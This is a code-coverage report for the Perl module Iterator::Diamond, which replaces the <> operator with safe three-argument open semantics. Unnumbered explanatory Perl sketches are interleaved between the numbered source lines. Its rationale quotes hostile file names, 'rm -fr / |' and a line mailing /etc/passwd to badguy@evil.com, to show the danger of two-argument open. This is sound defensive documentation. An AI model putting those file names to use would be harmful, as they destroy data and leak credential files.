File Coverage

blib/lib/Iterator/Diamond.pm
Criterion Covered Total %
statement 35 35 100.0
branch 7 8 87.5
condition 8 12 66.6
subroutine 9 9 100.0
pod 1 2 50.0
total 60 66 90.9


line stmt bran cond sub pod time code
1             #! perl
2              
3             package Iterator::Diamond;
4              
5 9     9   230011 use warnings;
  9         27  
  9         368  
6 9     9   48 use strict;
  9         20  
  9         309  
7 9     9   54 use Carp;
  9         18  
  9         983  
8 9     9   93 use base qw(Iterator::Files);
  9         29  
  9         7943  
9              
10             =head1 NAME
11              
12             Iterator::Diamond - Iterate through the files from ARGV
13              
14             =cut
15              
16             our $VERSION = '0.04';
17             $VERSION =~ tr/_//d;
18              
19             =head1 SYNOPSIS
20              
21             use Iterator::Diamond;
22              
23             $input = Iterator::Diamond->new;
24             while ( <$input> ) {
25             ...
26             warn("Current file is $ARGV\n");
27             }
28              
29             # Alternatively:
30             while ( $input->has_next ) {
31             $line = $input->next;
32             ...
33             }
34              
35             =head1 DESCRIPTION
36              
37             Iterator::Diamond provides a safe and customizable replacement for the
38             C<< <> >> (Diamond) operator.
39              
40             Just like C<< <> >> it returns the records of all files specified in
41             C<@ARGV>, one by one, as if it were one big happy file. In-place
42             editing of files is also supported. It does use C<@ARGV>, C<$ARGV> and
43             C<ARGVOUT> as documented in L<perlrun>, though without magic.
44              
45             As opposed to the built-in C<< <> >> operator, no magic is applied to
46             the file names unless explicitly requested. This means that you're
47             protected from file names that may wreak havoc on your system when
48             processed through the magic of the two-argument open() that Perl
49             normally uses for C<< <> >>.
50              
51             Iterator::Diamond is based on L<Iterator::Files>.
52              
53             =head1 RATIONALE
54              
55             Perl has two forms of open(), one with 2 arguments and one with 3 (or
56             more) arguments.
57              
58             The 2-argument open is magical. It opens a file for reading or writing
59             according to a leading '<' or '>', strips leading and trailing
60             whitespace, starts programs and reads their output, or writes to their
61             input. A filename '-' is taken to be the standard input or output of
62             the program, depending on whether the file is opened for reading or
63             writing.
64              
65             The 3-argument open is strict. The second argument designates the way
66             the file should be opened, and the third argument contains the file
67             name, taken literally.
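
The difference between the two forms shows up as soon as a file name carries trailing whitespace. The following is a minimal sketch using only core Perl; the scratch directory and the file name foo.txt are assumptions made for the demonstration, and the behaviour described is that of a typical Unix file system.

```perl
use strict;
use warnings;
use File::Temp qw(tempdir);

# Scratch directory, removed automatically at exit.
my $dir  = tempdir( CLEANUP => 1 );
my $real = "$dir/foo.txt";

open( my $out, '>', $real ) or die "Cannot create $real: $!";
print {$out} "hello\n";
close($out) or die "Cannot close $real: $!";

# The name as it might arrive from the command line: note the trailing space.
my $name = "$real ";

# Two-argument open strips the whitespace and opens foo.txt instead.
my $two_arg_line;
if ( open( my $fh, $name ) ) {
    $two_arg_line = <$fh>;
    close $fh;
}

# Three-argument open takes the name literally; no file "foo.txt " exists.
my $three_arg_ok  = open( my $fh3, '<', $name ) ? 1 : 0;
my $three_arg_err = $three_arg_ok ? '' : "$!";

print "2-arg open read: ", ( defined $two_arg_line ? $two_arg_line : "(nothing)\n" );
print "3-arg open ", ( $three_arg_ok ? "succeeded\n" : "failed: $three_arg_err\n" );
```

The two-argument form quietly reads a different file than the one named, while the three-argument form reports the mismatch.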
68              
69             Many programs read a series of files whose names are passed as command
70             line arguments. The diamond operator makes this very easy:
71              
72             while ( <> ) {
73             ....
74             }
75              
76             The program can then be run as something like
77              
78             myprog *.txt
79              
80             Internally, Perl uses the 2-argument open for this.
81              
82             What's wrong with that?
83              
84             Well, this goes horribly wrong if you have file names that trigger the
85             magic of Perl's 2-argument open.
86              
87             For example, if you have a file named ' foo.txt' (note the leading
88             space), running
89              
90             myprog *.txt
91              
92             will surprise you with the error message
93              
94             Can't open foo.txt: No such file or directory
95              
96             This is still reasonably harmless. But what if you have a file
97             '>bar.txt'? Now, silently a new file 'bar.txt' is created. If you're
98             lucky, that is. It can also silently wipe out valuable data.
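
The data loss described above can be reproduced safely in a scratch directory. This is a sketch using only core Perl; the directory, the victim file and its contents are assumptions made for the demonstration.

```perl
use strict;
use warnings;
use File::Temp qw(tempdir);

# Scratch directory, removed automatically at exit.
my $dir    = tempdir( CLEANUP => 1 );
my $victim = "$dir/bar.txt";

open( my $out, '>', $victim ) or die "Cannot create $victim: $!";
print {$out} "valuable data\n";
close($out) or die "Cannot close $victim: $!";

# A hostile "file name": a leading '>' followed by the victim's path.
my $name = ">$victim";

# Three-argument open looks for a file literally named ">...". It fails
# and leaves the victim untouched.
my $three_arg_ok         = open( my $fh3, '<', $name ) ? 1 : 0;
my $size_after_three_arg = ( -s $victim ) || 0;

# Two-argument open obeys the '>' and truncates the victim.
if ( open( my $fh2, $name ) ) {
    close $fh2;
}
my $size_after_two_arg = ( -s $victim ) || 0;

print "after 3-arg open: $size_after_three_arg bytes\n";
print "after 2-arg open: $size_after_two_arg bytes\n";
```

No error or warning is raised by the two-argument call; the only trace is the empty file.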
99              
100             When your system administrator runs scripts like this, malicious file
101             names like 'rm -fr / |' or '|mail < /etc/passwd badguy@evil.com' can
102             be a severe threat to your system.
103              
104             After a long discussion on the perl mailing list it was felt that this
105             security hole should be fixed. Iterator::Diamond does this by
106             providing a decent iterator that behaves just like C<< <> >>, but with
107             safe semantics.
108              
109             =head1 FUNCTIONS
110              
111             =head2 new
112              
113             Constructor. Creates a new iterator.
114              
115             The iterator can be used by calling its methods, but it can also be
116             used as argument to the readline operator. See the examples in
117             L</SYNOPSIS>.
118              
119             B<new> takes an optional series of key/value pairs to control the
120             exact way the iterator must behave.
121              
122             =over 4
123              
124             =item B<< magic => >> { none | stdin | all }
125              
126             C<none> applies three-argument open semantics to all file names and does
127             not use any magic. This is the default behaviour.
128              
129             C<stdin> is also safe. It applies three-argument open semantics but
130             allows a file name consisting of a single dash C<< - >> to mean the
131             standard input of the program. This is often very convenient.
132              
133             C<all> applies two-argument open semantics. This makes the iteration
134             unsafe again, just like the built-in C<< <> >> operator.
135              
136             =item B<< edit => >> I<suffix>
137              
138             Enables in-place editing of files, just like the built-in C<< <> >> operator.
139              
140             Unlike the built-in operator semantics, an empty suffix to discard backup
141             files is not supported.
142              
143             =item B<< use_i_option => >> I<boolean>
144              
145             If set to true, and if B<edit> is not specified, the perl command line
146             option C<-i>I<suffix> will be used to enable or disable in-place editing.
147             By default, perl command line options are ignored.
148              
149             =item B<< files => >> I<arrayref>
150              
151             Use this list of files instead of @ARGV.
152              
153             If C<files> is not specified and C<stdin> or C<all> magic is in effect,
154             an empty @ARGV will be treated as a list containing a single dash C<< - >>.
155              
156             =back
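
To make the C<none> and C<stdin> settings concrete, here is a minimal core-Perl sketch of an iterator with the same safe semantics. It is not the implementation used by Iterator::Diamond or Iterator::Files; the helper name make_safe_reader and its closure-based interface are hypothetical and exist only for this illustration.

```perl
use strict;
use warnings;

# Hypothetical helper, not part of Iterator::Diamond. Returns a closure that
# yields the records of the listed files one by one, or undef when exhausted.
sub make_safe_reader {
    my (%args) = @_;
    my $magic = defined $args{magic} ? $args{magic} : 'none';
    my @files = @{ $args{files} || [] };
    my $fh;

    return sub {
        while (1) {
            if ($fh) {
                my $line = <$fh>;
                return $line if defined $line;
                undef $fh;    # current file exhausted
            }
            return undef unless @files;
            my $name = shift @files;
            if ( $magic eq 'stdin' && $name eq '-' ) {
                $fh = \*STDIN;    # the only magic allowed in this mode
            }
            else {
                # Three-argument open: the name is taken literally.
                open( $fh, '<', $name ) or die "Can't open $name: $!\n";
            }
        }
    };
}

# Print every record of the files named on the command line.
my $next = make_safe_reader( magic => 'none', files => [@ARGV] );
while ( defined( my $line = $next->() ) ) {
    print $line;
}
```

Because every name goes through the three-argument open, a name such as '>bar.txt' can only ever be read, never written.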
157              
158             =cut
159              
160             sub new {
161 13     13 1 15475 my ($pkg, %args) = @_;
162 13         81 my $use_i_option = delete $args{use_i_option};
163 13 50 66     137 if ($use_i_option && !exists($args{edit}) && defined $^I) {
      66        
164 2         7 $args{edit} = $^I;
165             }
166 13         252 my $self = $pkg->SUPER::new( files => \@ARGV, %args );
167 12 100 66     145 if ( !exists($args{files}) && !@ARGV && $self->_magic_stdin ) {
      66        
168 1         4 @ARGV = qw(-);
169             }
170 12         30 $self->{_current_file} = \$ARGV;
171 12         127 return $self;
172             }
173              
174             =head2 next
175              
176             Method, no arguments.
177              
178             Returns the next record of the input stream, or undef if the stream is
179             exhausted.
180              
181             =cut
182              
183             sub readline {
184 48     48 0 686 shift->SUPER::readline;
185             }
186              
187             #### WARNING ####
188             # From overload.pm: Even in list context, the iterator is currently
189             # called only once and with scalar context.
190 9     9   138 use overload '<>' => \&readline;
  9         20  
  9         49  
191              
192             sub _advance {
193 27     27   40 my $self = shift;
194 27         121 my $res = $self->SUPER::_advance;
195 27 100       163 return unless $res;
196 14         292 open(ARGV, '<&=', fileno($self->{_current_fh}));
197 14 100       45 if ( $self->{_edit} ) {
198 9     9   887 no warnings 'once';
  9         18  
  9         1293  
199 2         30 open(ARGVOUT, '>&=', fileno($self->{_rewrite_fh}));
200             }
201 14         65 return $res;
202             }
203              
204             =head2 has_next
205              
206             Method, no arguments.
207              
208             Returns true if the stream is not exhausted. A subsequent call to
209             C<next> will return a defined value.
210              
211             This is the logical opposite of the 'eof()' function.
212              
213             =cut
214              
215             =head2 is_eof
216              
217             Method, no arguments.
218              
219             Returns true if the current file is exhausted. A subsequent call to
220             C<next> will open the next file if available and start reading it.
221              
222             This is the equivalent of the 'eof' function.
223              
224             =cut
225              
226             =head2 current_file
227              
228             Method, no arguments.
229              
230             Returns the name of the current file being processed.
231              
232             =cut
233              
234             =head1 GLOBAL VARIABLES
235              
236             Since Iterator::Diamond is a plug-in replacement for the built-in C<<
237             <> >> operator, it uses the same global variables as C<< <> >> for the
238             same purposes.
239              
240             =over 4
241              
242             =item @ARGV
243              
244             The list of file names to be processed. When a new file is opened, its
245             name is removed from the list.
246              
247             =item $ARGV
248              
249             The name of the file currently being processed. This can also be
250             obtained by using the iterator's C<current_file> method.
251              
252             =item $^I
253              
254             Enables in-place editing and, optionally, designates the backup suffix
255             for edited files. See L<perlrun> for details.
256              
257             Setting C<$^I> to I<suffix> has the same effect as using the Perl
258             command line argument C<-i>I<suffix> or using the C<< edit => >>I<suffix>
259             option to the iterator constructor.
260              
261             =item ARGVOUT
262              
263             When in-place editing, this file handle is used to open the new,
264             possibly modified, file to be written. This file handle is select()ed
265             for standard output.
266              
267             =back
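
The interplay of the backup suffix and the select()ed output handle can be sketched in core Perl as follows. This is an illustration of the general in-place editing technique, not the code used by Iterator::Diamond; the helper name edit_in_place and its arguments are hypothetical.

```perl
use strict;
use warnings;

# Hypothetical helper, not part of Iterator::Diamond. Rewrites $file through
# $transform, keeping the original contents in "$file$suffix".
sub edit_in_place {
    my ( $file, $suffix, $transform ) = @_;
    die "A non-empty backup suffix is required\n"
        unless defined $suffix && length $suffix;

    my $backup = $file . $suffix;
    rename( $file, $backup ) or die "Can't rename $file to $backup: $!\n";

    open( my $in,  '<', $backup ) or die "Can't open $backup: $!\n";
    open( my $out, '>', $file )   or die "Can't create $file: $!\n";

    # Mimic ARGVOUT being select()ed: a plain print goes to the new file.
    my $old = select($out);
    while ( defined( my $line = <$in> ) ) {
        my $new = $transform->($line);
        print $new;
    }
    select($old);

    close($in);
    close($out) or die "Can't close $file: $!\n";
    return $backup;
}

# Upper-case every file named on the command line, keeping *.bak copies.
edit_in_place( $_, '.bak', sub { uc $_[0] } ) for @ARGV;
```

Requiring a non-empty suffix mirrors the restriction noted for the edit option: the original file always survives as a backup.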
268              
269             =head1 LIMITATIONS
270              
271             Perl's internal ARGV processing is very magical, and cannot be
272             completely implemented in plain perl. However, the discrepancies
273             should not be noticeable in normal situations.
274              
275             Even in list context, the iterator C<< <$input> >> is currently called
276             only once and with scalar context. This will not work as expected:
277              
278             my @lines = <$input>;
279              
280             This reads all remaining lines:
281              
282             my @lines = $input->readline;
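
The list-context limitation comes from the overload mechanism itself and can be observed with any class that overloads C<< <> >>. The class Local::Countdown below is hypothetical and exists only for this sketch; how many items the list assignment receives depends on the behaviour documented in overload.pm, so the script prints the counts rather than assuming them.

```perl
use strict;
use warnings;

package Local::Countdown;    # hypothetical class, for illustration only

sub new {
    my ( $class, @items ) = @_;
    return bless { items => [@items] }, $class;
}

# Returns the next item, or undef when exhausted.
sub next_item {
    my ($self) = @_;
    return shift @{ $self->{items} };
}

use overload '<>' => \&next_item;

package main;

my $it = Local::Countdown->new(qw(a b c));

# List context: per the overload documentation the iterator is still
# invoked only once here.
my @first = <$it>;

# An explicit loop fetches whatever is left, one item per call.
my @rest;
while ( defined( my $item = <$it> ) ) {
    push @rest, $item;
}

printf "list assignment got %d item(s), the loop got %d more\n",
    scalar(@first), scalar(@rest);
```

Looping explicitly, or calling a method that is written to honour list context, avoids depending on how the overloaded operator is invoked.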
283              
284             =head1 SEE ALSO
285              
286             L, open() in L, L.
287              
288             =head1 AUTHOR
289              
290             Johan Vromans, C<< >>
291              
292             =head1 BUGS
293              
294             Please report any bugs or feature requests to C
295             at rt.cpan.org>, or through the web interface at
296             L. I
297             will be notified, and then you'll automatically be notified of
298             progress on your bug as I make changes.
299              
300             =head1 SUPPORT
301              
302             You can find documentation for this module with the perldoc command.
303              
304             perldoc Iterator::Diamond
305              
306             You can also look for information at:
307              
308             =over 4
309              
310             =item * RT: CPAN's request tracker
311              
312             L
313              
314             =item * CPAN Ratings
315              
316             L
317              
318             =item * Search CPAN
319              
320             L
321              
322             =back
323              
324             =head1 ACKNOWLEDGEMENTS
325              
326             This package was inspired by a most interesting discussion on the
327             perl5-porters mailing list, July 2008, on the topic of the unsafeness
328             of two-argument open() and its use in the C<< <> >> operator.
329              
330             =head1 COPYRIGHT & LICENSE
331              
332             Copyright 2008 Johan Vromans, all rights reserved.
333              
334             This program is free software; you can redistribute it and/or modify it
335             under the same terms as Perl itself.
336              
337             =cut
338              
339             =begin maybe_later
340              
341             sub TIEHANDLE {
342             goto &new;
343             }
344              
345             sub READLINE {
346             goto &readline;
347             }
348              
349             tie *::ARGV, 'Iterator::Diamond';
350              
351             =end maybe_later
352              
353             =cut
354              
355             1; # End of Iterator::Diamond
356              
357             __END__